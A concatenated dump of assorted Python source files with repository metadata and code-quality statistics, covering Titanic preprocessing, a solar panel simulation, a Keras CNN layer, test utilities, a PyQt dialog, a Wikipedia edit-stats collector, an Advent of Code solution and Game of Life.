returns- df with a new column named Title appended to original df
"""
temp = df.Name.apply(lambda x: x.split(',')[1].split(".")[0].strip())
df['Title'] = temp
return df
def pp_Age(df):
"""
imputes missing values of age through a groupby([Pclass,Title,isFemale])
returns df with new column named Age_nonull appended to it
"""
transformed_Age = df.groupby(["Title", 'Pclass', "Sex"])['Age'].transform(lambda x: x.fillna(x.median()))
df['Age_nonull'] = transformed_Age
return df
def pp_Fare(df):
'''
This will clip outliers to the middle 98% of the range
'''
temp = df['Fare'].copy()
limits = np.percentile(temp, [1, 99])
df.Fare = np.clip(temp, limits[0], limits[1])
return df
def pp_AgeBin(df):
"""
takes Age_nonull and puts in bins
returns df with new column- AgeBin
"""
z = df.Age_nonull.round() # some values went to 0 so clip to 1
binborders = np.linspace(0, 80, 17)
z = z.clip(1, None)
z = z.astype("int32")
df['AgeBin'] = pd.cut(z, bins=binborders, labels=False)
return df
def pp_Sex(df):
"""
maps male and female to 0 and 1
returns the df with is_Female added
"""
df['is_Female'] = df.Sex.apply(lambda row: 0 if row == "male" else 1) # one way
return df
def pp_Cabin(df):
"""
extracts the deck from the cabin. Mostly 1st class has cabin assignments. Replace
nan with "unk". Leaves as an ordinal categorical. can be onehoted later.
returns the df with Deck added as a column
"""
df["Deck"] = "UNK"
temp = df.loc[df.Cabin.notnull(), :].copy()
temp['D'] = temp.Cabin.apply(lambda z: z[0])
df.iloc[temp.index, -1] = temp["D"]
# df.where(df.Deck != "0", "UNK")
return df
def oneHot(df,col_list):
for col in col_list:
newcol_names = []
oh = OneHotEncoder(dtype="uint8",categories='auto')
# must convert df/series to array for onehot
vals = df[[col]].values
temp = oh.fit_transform(vals).toarray()#converts sparse to normal array
# the new names for columns
for name in oh.categories_[0]:
newcol_names.append(col + "_" + str(name))
tempdf = pd.DataFrame(temp, columns = newcol_names)
df = pd.concat([df, tempdf], axis=1)
return df
def scaleNumeric(df, cols):
"""
Standardize features by removing the mean and scaling to unit variance
"""
ss = StandardScaler()
scaled_features = ss.fit_transform(df[cols].values)
for i, col in enumerate(cols):
df[col + "_scaled"] = scaled_features[:, i]
return df
def chooseFeatures(df, alist):
"""
df is our dataframe with all new features added
alist is a list of cols to select for a new dataframe
returns df[alist]
"""
return df[alist]
def test_dtc(alist, df, labels):
"""
tests a decision tree model for classification
    prints out way too much stuff
returns a GridSearchCV classifier
"""
a = df[alist] # select columns
X_train, X_test, y_train, y_test = train_test_split(a, labels, test_size=0.2, random_state=42)
dtc = DecisionTreeClassifier()
dtc_dict = dt_dict = [{"max_depth": [2, 5, 8, 12, 15], "min_samples_leaf": [1, 2, 3],
"max_features": [None, 1.0, 2, 'sqrt', X_train.shape[1]]}]
clf = gscv_results_terse(dtc, dtc_dict, X_train, y_train, X_test, y_test)
return clf
#########################################################
# some utilities functions to aid in ml in general
def lin_to_log_even(min_num, max_num, num_pts=10):
"""
    This is really only needed when min_num << 1 and max_num >> 1
creates an evenly spaced log space from min_num to max_num
"""
lmin = np.log10(min_num)
lmax = np.log10(max_num)
ls = np.linspace(lmin, lmax, num_pts)
log_spaces = np.power(10, ls)
# print(["{:05f}".format(each) for each in log_spaces])
return log_spaces
def lin_to_log_random(num1, num2, num_pts=10):
"""
    This is really only needed when num1 << 1 and num2 >> 1
creates an array of random selected pts of len num_pts
each point is in the log space from min_num to max_num
"""
ln1 = np.log10(num1)
ln2 = np.log10(num2)
range_bn = np.abs(ln2 - ln1)
z = ln2 + np.random.rand(num_pts) * -range_bn
zz = np.power(10, z)
print(["{:05f}".format(each) for each in zz])
return zz
avg_line_length: 31.870968 | max_line_length: 109 | alphanum_fraction: 0.624944
quality signals (*_quality_signal): num_words 1,293 | num_chars 8,892 | mean_word_length 4.08894 | frac_words_unique 0.273782 | frac_chars_top_2/3/4grams 0.016645 / 0.018725 / 0.015888 | frac_chars_dupe_5-10grams 0.237375 / 0.198979 / 0.198979 / 0.188765 / 0.164933 / 0.164933 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.017174 | frac_chars_whitespace 0.246964 | size_file_byte 8,892 | num_lines 279 | num_chars_line_max 110 | num_chars_line_mean 31.870968 | frac_chars_alphabet 0.772401 | frac_chars_comments 0.233468 | cate_xml_start 0 | frac_lines_dupe_lines 0.230263 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.137084 | frac_chars_long_word_length 0.018962 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.111842 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.052632 | frac_lines_simplefunc 0 | score_lines_no_logic 0.269737 | frac_lines_print 0.197368
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a80cfdeae5dd9779dfdf75f7f464b230527883ae | size: 1,167 | ext: py | lang: Python
repo: BoKleynen/P-O-3-Smart-Energy-Home | path: src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py | head_hexsha: 4849038c47199aa0a752ff5a4f2afa91f4a9e8f0 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
import matplotlib.pyplot as plt
import pandas as pd
from house.production.solar_panel import SolarPanel
from house import House
from math import pi
from time import time
start_time = time()
solar_panel_east = SolarPanel(285.0, 10*pi/180, -pi/2, 0.87, 1.540539, 10)
solar_panel_west = SolarPanel(285.0, 10*pi/180, pi/2, 0.87, 1.540539, 10)
house = House([], solar_panel_tp=(solar_panel_east, solar_panel_west))
irradiance_df = pd.read_csv(filepath_or_buffer="C:\\Users\\Lander\\Documents\\KULeuven\\2e bachelor\\semester 1\\P&O 3\\P-O-3-Smart-Energy-Home\\data\\Irradiance.csv",
header=0,
index_col="Date/Time",
dtype={"watts-per-meter-sq": float},
parse_dates=["Date/Time"]
)
start = pd.Timestamp("2016-06-17 00:00:00")
# end = pd.Timestamp("2017-04-21 23:55:00")
end = pd.Timestamp("2016-06-17 23:55:00")
times = pd.date_range(start, end, freq="300S")
data = [house.power_production(t, irradiance_df) for t in pd.date_range(start, end, freq="300S")]
# print(data)
plt.plot(data)
print(time() - start_time)
plt.show()
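# A hedged alternative (assumption: the script is run from the repository
# root): resolving the CSV relative to the repo avoids the machine-specific
# absolute Windows path above.
# from pathlib import Path
# irradiance_df = pd.read_csv(Path("data") / "Irradiance.csv",
#                             header=0,
#                             index_col="Date/Time",
#                             dtype={"watts-per-meter-sq": float},
#                             parse_dates=["Date/Time"])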
33.342857 | 167 | 0.642674 | 182 | 1,167 | 3.994505 | 0.461538 | 0.082531 | 0.035763 | 0.044017 | 0.225585 | 0.173315 | 0.173315 | 0.099037 | 0.099037 | 0.099037 | 0 | 0.105092 | 0.209083 | 1,167 | 34 | 168 | 34.323529 | 0.682557 | 0.045416 | 0 | 0 | 0 | 0.043478 | 0.179279 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.26087 | 0 | 0.26087 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a813a7003f5f5d2c9a1b282747c12188d836b770 | 2,468 | py | Python
src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | ["MIT"] | 9 | 2021-11-01T06:06:33.000Z | 2022-02-07T12:21:18.000Z
src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | ["MIT"] | null | null | null
src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | ["MIT"] | 1 | 2022-03-06T07:38:32.000Z | 2022-03-06T07:38:32.000Z
from tensorflow.keras.layers import Layer, Conv1D, Input, Dropout, MaxPool1D, Masking
import tensorflow.keras.backend as K
from tensorflow.keras import Model
import tensorflow as tf
class CNN1D(Layer):
def __init__(self, filters=(32, 64), pooling_sizes=(4, 4), kernel_size=3, stride_size=1, using_dropout=True,
using_bias=False, dropout_rate=0.1, **kwargs):
"""
1D CNN model
:param filters: filter numbers in the CNN blocks
:param pooling_sizes: max pooling size in each block
:param kernel_size: kernel size of CNN layer
:param stride_size: stride of CNN layer
:param using_dropout: flag to use dropout or not
:param using_bias: flag to use bias in CNN or not
:param dropout_rate: dropout rate if using it
        :param kwargs: other config params
"""
self.filters = filters
self.kernel_size = kernel_size
self.stride_size = stride_size
self.using_dropout = using_dropout
self.conv1d = []
self.pooling = []
self.dropout = []
for i, s_filter in enumerate(filters):
self.conv1d.append(Conv1D(s_filter,
kernel_size,
padding='same',
strides=stride_size,
use_bias=using_bias,
name='conv{}'.format(i)
))
self.pooling.append(MaxPool1D(pool_size=pooling_sizes[i], name='pool{}'.format(i)))
if using_dropout:
self.dropout = Dropout(rate=dropout_rate)
super(CNN1D, self).__init__(**kwargs)
def build(self, input_shape):
super(CNN1D, self).build(input_shape)
def call(self, x, mask=None):
for i in range(len(self.conv1d)):
x = self.conv1d[i](x)
x = self.pooling[i](x)
if self.using_dropout:
x = self.dropout(x)
x = K.squeeze(x, axis=-2)
return x
def compute_output_shape(self, input_shape):
return 1, self.filters[-1]
if __name__ == '__main__':
input_shape = (16, 5 * 256)
filters = [32, 64, 128, 256]
pooling_sizes = [2, 2, 2, 2]
inputs = Input(shape=input_shape)
x = CNN1D(filters=filters, pooling_sizes=pooling_sizes)(inputs)
model = Model(inputs=inputs, outputs=x)
model.summary()
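    # Sanity check (an added sketch, not part of the original file):
    # K.squeeze(x, axis=-2) in call() assumes the pooled length is exactly 1,
    # i.e. the product of pooling_sizes must equal the input sequence length
    # (Conv1D here uses stride 1 with 'same' padding, so only pooling shrinks it).
    from functools import reduce
    from operator import mul
    assert reduce(mul, pooling_sizes) == input_shape[0]  # 2 * 2 * 2 * 2 == 16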
37.393939 | 112 | 0.573339 | 306 | 2,468 | 4.444444 | 0.313725 | 0.052941 | 0.027941 | 0.029412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027778 | 0.329011 | 2,468 | 65 | 113 | 37.969231 | 0.793478 | 0.15316 | 0 | 0 | 0 | 0 | 0.011988 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.086957 | 0.021739 | 0.23913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a81435452d7a1fd0220c50904adbc5e774a45f27 | 931 | py | Python
test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | ["Apache-2.0"] | null | null | null
test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | ["Apache-2.0"] | null | null | null
test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | ["Apache-2.0"] | null | null | null
import json
import os
import mock
def mock_response(json_str=None, raw=None):
resp = mock.MagicMock()
if json_str is not None:
loaded_json = json.loads(json_str)
resp.json = mock.MagicMock(return_value=loaded_json)
if raw is not None:
resp.raw = mock.MagicMock()
resp.raw.read = mock.MagicMock(return_value=raw)
return resp
def get_data_filepath(filename):
"""Construct filepath for a file in the test/data directory
Args:
filename: name of file
Returns:
full path to file
"""
return os.path.join(os.path.dirname(__file__), 'data', filename)
def load_from_file(filename):
"""Load the contents of a file in the data directory.
Args:
filename: name of file to load
Returns:
contents of file as a string
"""
filepath = get_data_filepath(filename)
with open(filepath) as f:
return f.read()
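# Example usage (added sketch; hypothetical test names, not from the source):
def test_mock_response_roundtrip():
    resp = mock_response(json_str='{"status": "ok"}')
    assert resp.json() == {"status": "ok"}
    resp = mock_response(raw=b"payload")
    assert resp.raw.read() == b"payload"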
21.159091 | 68 | 0.651987 | 133 | 931 | 4.428571 | 0.360902 | 0.088285 | 0.03056 | 0.081494 | 0.118846 | 0.118846 | 0.118846 | 0 | 0 | 0 | 0 | 0 | 0.26101 | 931 | 43 | 69 | 21.651163 | 0.856105 | 0.274973 | 0 | 0 | 0 | 0 | 0.006472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a81666f0e6701e07b7dd6f00c88fe2096ec32290 | 391 | py | Python
archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | ["MIT"] | null | null | null
archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | ["MIT"] | null | null | null
archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | ["MIT"] | 1 | 2018-02-26T03:14:46.000Z | 2018-02-26T03:14:46.000Z
import sys
peak = []
with open(sys.argv[1], 'r') as f:
    for line in f:
        line = line.strip('\n').split('\t')
        peak.append(int(line[3]))
num = int(len(peak) / 100.0)
bins = []
for i in range(99):
    bins.append(str(i + 1) + '\t' + str(sum(peak[num * i:num * (i + 1)]) / (num * 1.0)) + '\n')
bins.append('100' + '\t' + str(sum(peak[num * 99:]) / (num * 1.0)) + '\n')
with open('bin.txt', 'w') as f:
    f.writelines(bins)
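# Equivalent vectorised sketch with numpy (an added rewrite, not part of the
# original script); note the original divides the final bin by num even
# though that bin can hold more than num peaks, which is preserved here.
# import numpy as np
# peak = np.asarray(peak, dtype=float)
# means = [peak[num * i:num * (i + 1)].sum() / num for i in range(99)]
# means.append(peak[num * 99:].sum() / num)
# with open('bin.txt', 'w') as out:
#     out.writelines("{}\t{}\n".format(i + 1, m) for i, m in enumerate(means))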
20.578947 | 73 | 0.59335 | 83 | 391 | 2.795181 | 0.409639 | 0.068966 | 0.060345 | 0.094828 | 0.12069 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053824 | 0.097187 | 391 | 18 | 74 | 21.722222 | 0.603399 | 0 | 0 | 0 | 0 | 0 | 0.061381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a8178087a6d24532c3fa392eae43c6d6a8b30612 | 4,595 | py | Python
MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | ["MIT"] | null | null | null
MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | ["MIT"] | 2 | 2019-07-31T23:14:14.000Z | 2020-12-26T16:27:02.000Z
MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | ["MIT"] | 2 | 2019-07-31T22:22:06.000Z | 2020-07-14T04:58:16.000Z
from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QLabel, QLineEdit, QVBoxLayout, QMessageBox, QCheckBox,\
    QSpinBox, QComboBox, QListWidget, QDialog, QFileDialog, QProgressBar, QTableWidget, QTableWidgetItem,\
    QAbstractItemView, QSplitter, QSizePolicy, QAbstractScrollArea, QHBoxLayout, QTextEdit, QShortcut,\
    QProgressDialog
from PyQt5.QtGui import QPalette, QKeySequence, QDoubleValidator, QIntValidator
from PyQt5.QtCore import Qt, QThread, QSignalMapper
import sys
import pyqtgraph as pg
class MultiInputDialog(QDialog):
def __init__(self, inputs={'Input':'default value'}, title='Multi Input Dialog', parent=None):
QDialog.__init__(self, parent)
self.setWindowTitle(title)
self.inputs=inputs
self.intValidator = QIntValidator()
self.floatValidator = QDoubleValidator()
self.createUI()
def createUI(self):
self.vblayout = QVBoxLayout(self)
self.layoutWidget = pg.LayoutWidget()
self.vblayout.addWidget(self.layoutWidget)
self.labels={}
self.inputFields={}
for key, value in self.inputs.items():
self.labels[key] = QLabel(key)
self.layoutWidget.addWidget(self.labels[key])
if type(value)==int:
self.signalMapper1 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.intValidator)
self.inputFields[key].textChanged.connect(self.signalMapper1.map)
self.signalMapper1.setMapping(self.inputFields[key], key)
self.signalMapper1.mapped[str].connect(self.inputChanged)
elif type(value)==float:
self.signalMapper2 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.floatValidator)
self.inputFields[key].textChanged.connect(self.signalMapper2.map)
self.signalMapper2.setMapping(self.inputFields[key], key)
self.signalMapper2.mapped[str].connect(self.inputChanged)
elif type(value)==bool:
self.signalMapper3 = QSignalMapper(self)
self.inputFields[key]=QCheckBox()
self.inputFields[key].setTristate(False)
self.inputFields[key].stateChanged.connect(self.signalMapper3.map)
self.signalMapper3.setMapping(self.inputFields[key], key)
self.signalMapper3.mapped[str].connect(self.inputStateChanged)
elif type(value)==str:
self.signalMapper4 = QSignalMapper(self)
self.inputFields[key] = QLineEdit(value)
self.inputFields[key].textChanged.connect(self.signalMapper4.map)
self.signalMapper4.setMapping(self.inputFields[key], key)
self.signalMapper4.mapped[str].connect(self.inputChanged)
elif type(value)==list:
self.signalMapper5 = QSignalMapper(self)
self.inputFields[key] = QComboBox()
self.inputFields[key].addItems(value)
self.inputFields[key].currentTextChanged.connect(self.signalMapper5.map)
self.signalMapper5.setMapping(self.inputFields[key], key)
self.signalMapper5.mapped[str].connect(self.inputTextChanged)
self.layoutWidget.addWidget(self.inputFields[key])
self.layoutWidget.nextRow()
self.layoutWidget.nextRow()
self.cancelButton = QPushButton('Cancel')
self.cancelButton.clicked.connect(self.cancelandClose)
self.layoutWidget.addWidget(self.cancelButton, col=0)
self.okButton = QPushButton('OK')
self.okButton.clicked.connect(self.okandClose)
self.layoutWidget.addWidget(self.okButton, col=1)
self.okButton.setDefault(True)
def inputChanged(self, key):
self.inputs[key]=self.inputFields[key].text()
def inputStateChanged(self, key):
if self.inputFields[key].checkState():
self.inputs[key]=True
else:
self.inputs[key]=False
def inputTextChanged(self, key):
self.inputs[key]=self.inputFields[key].currentText()
print(self.inputs[key])
def okandClose(self):
self.accept()
def cancelandClose(self):
self.reject()
if __name__=='__main__':
app = QApplication(sys.argv)
dlg = MultiInputDialog(inputs={'value':100,'value2':10.0,'fit':True,'func':['Lor','Gau']})
dlg.show()
sys.exit(app.exec_())
47.864583 | 120 | 0.654189 | 449 | 4,595 | 6.657016 | 0.289532 | 0.120442 | 0.138508 | 0.05353 | 0.264972 | 0.241552 | 0.128137 | 0.128137 | 0.057544 | 0.057544 | 0 | 0.009078 | 0.232862 | 4,595 | 96 | 121 | 47.864583 | 0.838865 | 0 | 0 | 0.045455 | 0 | 0 | 0.016536 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079545 | false | 0 | 0.056818 | 0 | 0.147727 | 0.011364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a81b25109e2c25d80338be4ee486823e581a2347 | 3,813 | py | Python
src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | ["MIT"] | null | null | null
src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | ["MIT"] | 1 | 2022-01-09T12:07:13.000Z | 2022-01-09T15:29:41.000Z
src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | ["MIT"] | null | null | null
import os
import psutil
import json
import sqlite3
import threading
from datetime import datetime, timezone
from websocket import create_connection
class CustomHandler:
def __init__(self):
self.working = False
self.counter = 0
self.ws = None
if self.dbReady('./data/wiki_statsDB'):
self.setStatus(True, 'Function handler on standby')
else:
self.setStatus(False, 'Database error, cannot start service')
def dbReady(self, path) -> bool:
try:
self.db = sqlite3.connect(path, check_same_thread=False)
self.cursor = self.db.cursor()
self.cursor.execute('''CREATE TABLE IF NOT EXISTS stats(\
id INTEGER PRIMARY KEY,\
country_name TEXT,\
change_size INTEGER)''')
self.db.commit()
return True
except sqlite3.OperationalError:
return False
def worker(self, stop_event):
while not stop_event.is_set():
result = self.ws.recv()
country = None
if "geo_ip" in result:
j_dict = json.loads(result)
geo = j_dict.get("geo_ip")
country = geo.get("country_name")
change = j_dict.get("change_size")
if change is None:
change = 0
if country is not None:
self.cursor.execute('''INSERT INTO stats(country_name, change_size) VALUES(?,?)''', (country, change))
self.db.commit()
self.counter += 1
def setStatus(self, status, msg):
self.status = status
self.message = msg
def getStatus(self) -> json:
stat_result = os.stat('./data/wiki_statsDB')
modified = datetime.fromtimestamp(stat_result.st_mtime, tz=timezone.utc).strftime("%m/%d/%Y, %H:%M:%S")
msg = {"Status": self.status, "Message": self.message, "Working in background": self.working, "Records in session": self.counter, "DB size (bytes)": stat_result.st_size, "Modified": modified}
return msg
def getMemory(self) -> json:
memory = 1024 * 1024
proc = psutil.Process(os.getpid())
mem0 = proc.memory_info().rss
msg = str(mem0/memory) + 'Mb'
return {'Memory use': msg}
def getTotals(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, SUM(change_size) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def getCounts(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, COUNT(country_name) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def stopWork(self) -> json:
        self.ws.close()
self.working = False
self.kill_switch.set()
self.t.join()
self.setStatus(True, 'Function handler on standby')
msg = 'Function handler background work stopped'
return {'message': msg}
def startWork(self) -> json:
if self.working:
msg = 'Function handler already working in background, ignoring request'
return {"message": msg}
else:
self.ws = create_connection("ws://wikimon.hatnote.com:9000")
self.working = True
self.setStatus(True, 'Function handler working in background')
self.kill_switch = threading.Event()
self.t = threading.Thread(target=self.worker, args=(self.kill_switch,))
self.t.start()
msg = 'Function handler background work started'
return {'message': msg}
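# Hypothetical driver (added sketch, not in the original module): collect
# events for a few seconds, then inspect status; assumes ./data exists.
if __name__ == '__main__':
    import time
    handler = CustomHandler()
    print(handler.startWork())
    time.sleep(10)
    print(handler.getStatus())
    print(handler.stopWork())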
32.87069 | 199 | 0.575924 | 445 | 3,813 | 4.847191 | 0.332584 | 0.040797 | 0.031525 | 0.034771 | 0.203987 | 0.159481 | 0.159481 | 0.121465 | 0.121465 | 0.078813 | 0 | 0.009157 | 0.312615 | 3,813 | 115 | 200 | 33.156522 | 0.813812 | 0 | 0 | 0.228261 | 0 | 0 | 0.218988 | 0.007606 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.076087 | 0 | 0.293478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a81fa302f2ff4cbc6dc18bbb647920f29a503d5e | 1,897 | py | Python
2017/23b.py | mcbor/advent_of_code_2016 | 14453b970d3e0f031ae6a66f2028652b6ed870dd | ["MIT"] | 1 | 2016-12-17T10:53:22.000Z | 2016-12-17T10:53:22.000Z
2017/23b.py | mcbor/adventofcode | 14453b970d3e0f031ae6a66f2028652b6ed870dd | ["MIT"] | null | null | null
2017/23b.py | mcbor/adventofcode | 14453b970d3e0f031ae6a66f2028652b6ed870dd | ["MIT"] | null | null | null
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
23b.py
~~~~~~
Advent of Code 2017 - Day 23: Coprocessor Conflagration
Part Two
Now, it's time to fix the problem.
The debug mode switch is wired directly to register a. You flip the switch,
which makes register a now start at 1 when the program is executed.
Immediately, the coprocessor begins to overheat. Whoever wrote this program
obviously didn't choose a very efficient implementation. You'll need to
optimize the program if it has any hope of completing before Santa needs
that printer working.
The coprocessor's ultimate goal is to determine the final value left in
register h once the program completes. Technically, if it had that... it
wouldn't even need to run the program.
After setting register a to 1, if the program were to run to completion,
what value would be left in register h?
:copyright: (c) 2017 by Martin Bor.
:license: MIT, see LICENSE for more details.
"""
import sys
import math
def is_prime(n):
if n < 2:
return False
if n < 4:
return True
if n % 2 == 0 or n % 3 == 0:
return False
    for i in range(5, int(math.sqrt(n)) + 1, 6):
if n % i == 0 or n % (i + 2) == 0:
return False
return True
def solve(instructions):
"""Return value of h.
Hand optimized.
"""
instr, reg, val = instructions.split('\n')[0].split()
assert instr == 'set'
assert reg == 'b'
b = int(val) * 100 + 100000
start = b - 17000
end = b + 1
return sum(not is_prime(x) for x in range(start, end, 17))
def main(argv):
if len(argv) == 2:
f = open(argv[1], 'r')
else:
sys.stderr.write('reading from stdin...\n')
f = sys.stdin
print(solve(f.read().strip()))
if __name__ == "__main__":
sys.exit(main(sys.argv))
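# Added sanity sketch (not in the original): cross-check the 6k±1 primality
# test against naive trial division for small n.
# def is_prime_naive(n):
#     return n >= 2 and all(n % d for d in range(2, int(n ** 0.5) + 1))
# assert all(is_prime(n) == is_prime_naive(n) for n in range(2000))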
24.012658 | 79 | 0.615709 | 297 | 1,897 | 3.89899 | 0.542088 | 0.043178 | 0.02418 | 0.025907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035897 | 0.280443 | 1,897 | 78 | 80 | 24.320513 | 0.812454 | 0.508171 | 0 | 0.16129 | 0 | 0 | 0.045346 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0.096774 | false | 0 | 0.064516 | 0 | 0.354839 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a81fc289f1eb7f0a4f761bd960c55555bea22c98 | 4,456 | py | Python
game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | ["MIT"] | null | null | null
game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | ["MIT"] | null | null | null
game_of_life.py | WinterWonderland/Game_of_Life | 99eced42146a195b6a7bc423f76f0fd79f5771d2 | ["MIT"] | null | null | null
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 20 11:59:50 2018
@author: klaus
"""
import numpy as np
import matplotlib.pyplot as plt
import time
import random
from argparse import ArgumentParser, RawTextHelpFormatter
class GameOfLife:
def __init__(self, width, height, interval, seed):
random.seed(seed)
self.height = height
self.width = width
self.interval = interval
self.epoch = 0
self.board = np.zeros((self.height, self.width))
for x in range(int(self.width / 2 - self.width / 4), int(self.width / 2 + self.width / 4 + 1)):
for y in range(int(self.height / 2 - self.height / 4), int(self.height / 2 + self.height / 4 + 1)):
self.board[y][x] = random.choice([0, 1])
self.fig, self.ax = plt.subplots(figsize=(10, 10), num=1)
self.fig.show()
self.plot_board()
def run(self):
while self.run_step():
time.sleep(self.interval)
def run_step(self):
self.epoch += 1
new_board = self.board.copy()
for x in range(self.width):
for y in range(self.height):
living_neighbors = self.board[y - 1 if y > 0 else self.height - 1][x - 1 if x > 0 else self.width - 1] + \
self.board[y - 1 if y > 0 else self.height - 1][x] + \
self.board[y - 1 if y > 0 else self.height - 1][x + 1 if x < self.width - 1 else 0] + \
self.board[y][x - 1 if x > 0 else self.width - 1] + \
self.board[y][x + 1 if x < self.width - 1 else 0] + \
self.board[y + 1 if y < self.height - 1 else 0][x - 1 if x > 0 else self.width - 1] + \
self.board[y + 1 if y < self.height - 1 else 0][x] + \
self.board[y + 1 if y < self.height - 1 else 0][x + 1 if x < self.width - 1 else 0]
if self.board[y][x] == 0 and living_neighbors == 3:
new_board[y][x] = 1
if self.board[y][x] == 1 and (living_neighbors < 2 or living_neighbors > 3):
new_board[y][x] = 0
if (self.board == new_board).all():
return False
self.board = new_board
self.plot_board()
return True
def plot_board(self):
print("Epoch:", self.epoch)
self.ax.clear()
self.ax.imshow(self.board, cmap="Greys", interpolation="None")
self.fig.canvas.draw()
self.fig.canvas.flush_events()
if __name__ == "__main__":
